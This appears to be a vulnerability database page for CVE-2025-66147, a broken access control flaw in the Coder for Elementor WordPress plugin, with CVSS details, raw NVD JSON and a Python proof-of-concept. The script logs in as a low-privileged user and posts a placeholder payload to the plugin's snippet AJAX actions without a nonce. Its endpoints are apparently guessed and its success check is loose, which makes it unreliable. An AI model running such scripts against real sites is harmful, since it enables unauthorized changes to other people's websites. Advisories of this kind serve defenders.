Security Vulnerability Report
中文
CVE-2025-66147 CVSS 5.4 MEDIUM

CVE-2025-66147

Published: 2025-12-16 09:15:58
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in merkulove Coder for Elementor coder-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Coder for Elementor: from n/a through <= 1.0.13.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Coder for Elementor <= 1.0.13

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-66147 PoC - Coder for Elementor Broken Access Control # Target: WordPress site with Coder for Elementor plugin <= 1.0.13 def exploit_cve_2025_66147(target_url, username, password): """ Exploit Missing Authorization vulnerability in Coder for Elementor plugin This PoC demonstrates how a low-privileged user can perform admin actions """ session = requests.Session() # Step 1: Login as low-privileged user login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed") return False print("[+] Logged in as low-privileged user") # Step 2: Exploit broken access control # Try to access admin-only functionality exploit_endpoints = [ f"{target_url}/wp-admin/admin-ajax.php?action=coder_elementor_save_snippet", f"{target_url}/wp-admin/admin-ajax.php?action=coder_elementor_delete_snippet", f"{target_url}/wp-admin/admin-ajax.php?action=coder_elementor_get_snippets" ] for endpoint in exploit_endpoints: exploit_data = { 'nonce': '', # May be missing or bypassable 'snippet_data': 'malicious_payload', 'post_id': 1 } response = session.post(endpoint, data=exploit_data) if response.status_code == 200: print(f"[+] Potential vulnerable endpoint: {endpoint}") print(f"[+] Response: {response.text[:200]}") return True if __name__ == "__main__": if len(sys.argv) < 4: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") print(f"Example: python {sys.argv[0]} http://example.com subscriber password123") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_cve_2025_66147(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66147", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:15:58.167", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in merkulove Coder for Elementor coder-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Coder for Elementor: from n/a through <= 1.0.13."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/coder-elementor/vulnerability/wordpress-coder-for-elementor-plugin-1-0-13-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}